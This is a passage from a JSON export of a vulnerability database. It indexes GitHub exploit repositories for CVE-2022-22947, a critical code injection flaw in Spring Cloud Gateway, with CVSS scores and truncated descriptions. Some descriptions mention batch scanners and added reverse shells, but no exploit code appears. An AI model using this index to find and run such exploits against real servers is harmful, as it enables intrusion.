"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-06-08T09:52:23", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Cloud Gateway", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22947"], "modified": "2022-06-14T09:22:52", "id": "EEA12A00-A397-5497-AFD6-3427AD52C0BF", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-16T16:08:47", "description": "# Spring Cloud Gateway Actuator API SpEL Code Injection (CVE-202...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-15T15:41:36", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Cloud Gateway", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22947"], "modified": "2022-04-16T15:31:32", "id": "159F2FD0-B230-5CB7-B1E6-E7A0ABD62FDE", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-28T10:31:31", "description": "## SpringCloud-Gateway\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\uff08CVE-2022-22947\uff09\n\n\n\n## \u73af\u5883\u642d\u5efa\n\n### \u65b9\u5f0f\u4e00...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-06T09:40:05", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Cloud Gateway", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22947"], "modified": "2022-06-28T08:22:41", "id": "2351C71F-EB0C-5CD1-A11A-4267F7CF31CC", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-22T05:17:03", "description": "# Spring-Cloud-Gateway-CVE-2022-22947\n\n\nSpring Cloud Gateway\u8fdc\u7a0b\u4ee3\u7801...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-02T11:58:55", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Cloud Gateway", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22947"], "modified": "2022-06-22T05:16:43", "id": "21A6C8CA-CA60-5265-8DE4-CD23E0ADB7B3", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-30T14:04:00", "description": "# CVE-2022-22947-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-29T01:07:26", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Cloud Gateway", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22947"], "modified": "2022-05-29T01:08:13", "id": "4A5CE074-5AD9-5FFA-BA3C-E78DD01450FF", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-29T21:04:37", "description": "# CVE-2022-22947-RCE\nCVE-2022-22947 RCE\n\n\nSpring Cloud Gateway p...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-03T10:44:36", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Cloud Gateway", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22947"], "modified": "2022-03-29T17:37:28", "id": "6D6C4503-DBCD-574F-AFFF-A5B58CC302A1", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-17T20:33:05", "description": "# cve-2022-22947\np...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-03T09:30:37", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Cloud Gateway", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22947"], "modified": "2022-03-03T09:27:45", "id": "CC545F18-210E-5AB5-A927-503D6F3EC956", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-17T10:10:20", "description": "# CVE-2022-22947_Rce_Exp\nSpring Cloud Gateway \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1eExp Spring...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-03T13:13:02", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Cloud Gateway", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22947"], "modified": "2022-06-17T02:50:59", "id": "94FA0473-BF7E-567A-BCBB-3DAD20F38627", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-30T12:20:02", "description": "# SpringCloudGateway\u8fdc\u7a0b\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\n\n## Code...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-03T19:45:18", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Cloud Gateway", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22947"], "modified": "2022-06-30T06:11:39", "id": "8E7595A3-22D3-53BC-A49E-8C148D00701A", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-17T20:32:42", "description": "# cve-2022-22947\n\n`Spring Cloud Gateway` \u662fSpring\u4e2d\u7684\u4e00\u4e2aAPI\u7f51\u5173\u3002\u51763.1.0...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-07T15:12:45", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Cloud Gateway", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22947"], "modified": "2022-03-15T12:26:38", "id": "FBA7DE43-C816-5C81-9D69-0C4F1469B382", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-19T17:20:53", "description": "## \u4e00\u3001Spring Cloud Gateway\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\n\n \u5371\u5bb3\u7b49\u7ea7\uff1a\u9ad8\u5371\n\n POC/EXP\u60c5\u51b5\uff1a\u5df2\u516c\u5f00\n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-19T14:58:45", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Cloud Gateway", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22947"], "modified": "2022-05-19T16:40:56", "id": "93CA136A-0D64-5328-8220-EEBB9F01C2B5", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-11T17:58:05", "description": "# Spring Cloud Gateway Actuator API SpEL\u8868\u8fbe\u5f0f\u6ce8\u5165\u547d\u4ee4\u6267\u884c\uff08CVE-2022-22947...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-13T10:00:21", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Cloud Gateway", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22947"], "modified": "2022-04-08T02:40:09", "id": "F72C0887-8889-5677-AB4E-15C4E99F77F3", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-14T08:30:43", "description": "# CVE-2022-22947-ex...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-10T03:51:47", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Cloud Gateway", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22947"], "modified": "2022-06-14T03:23:57", "id": "B02C7B49-750E-513B-86BC-56D7CE31383D", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-30T14:55:18", "description": "# CVE-2022-229...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-04T05:45:05", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Cloud Gateway", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22947"], "modified": "2022-03-30T14:19:37", "id": "958E6CA0-04A6-50FD-B7DC-4BC25760440E", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-16T16:03:57", "description": "# -cve-2022-22947-\n#### cve-2022-22947 spring cloud gateway \u6279\u91cf\u626b\u63cf...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-04T07:24:58", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Cloud Gateway", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22947"], "modified": "2022-05-16T12:52:46", "id": "461FCF6D-F08B-5C1B-8AA0-0280EF31F86E", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-26T11:28:39", "description": "# CVE-2022-22947-Rce_POC\n\u6279\u91cfurl\u68c0\u6d4bSpring-Cloud-Gateway-CVE-2022-22...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-04T14:58:02", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Cloud Gateway", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22947"], "modified": "2022-04-26T08:40:31", "id": "BAD2432C-C81D-5EF9-865B-2F4E12B34558", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-11T17:50:11", "description": "\u5728\u738b\u653f\u4ee3\u7801\u57fa\u7840\u4e0a\u6dfb\u52a0\u4e86\uff0c\u4e24\u79cd\u53cd\u5f39shell\uff0c\u51fa\u7f51\u63a2\u6d4b\uff0c\n\u8fd0\u884c\u884c\u65f6\u7f3a\u5c11\u4ec0\u4e48\u6a21\u5757\u3002\u4f7f\u7528pip\u4e0b\u8f7d\u54ea\u4e2a\u6a21\u5757\u5c31\u884c\u4e86\u3002\n\n\u8f93\u5165\u53ef\u7591\u7684url...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-29T17:17:34", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Cloud Gateway", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22947"], "modified": "2022-04-11T12:37:37", "id": "759E062A-0520-564A-8473-82BC4E09CCCA", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-17T20:33:06", "description": "# Spring-Cloud-Gateway(CVE-2022-22947)\nSpring C...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-04T02:36:02", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Cloud Gateway", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22947"], "modified": "2022-03-04T02:46:40", "id": "B9F78DFB-D2B3-54BE-AF98-69D2F32FC6C6", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-17T20:33:10", "description": "# CVE-2022-22947...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-04T05:26:33", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Cloud Gateway", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22947"], "modified": "2022-03-04T05:28:12", "id": "4CF56666-BB73-546A-960C-A8AF10581233", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-17T20:33:01", "description": "# Spring Cloud Gateway RCE Env CVE-2022-22947\n\n> CVE-2022-2294...", "cvss3": 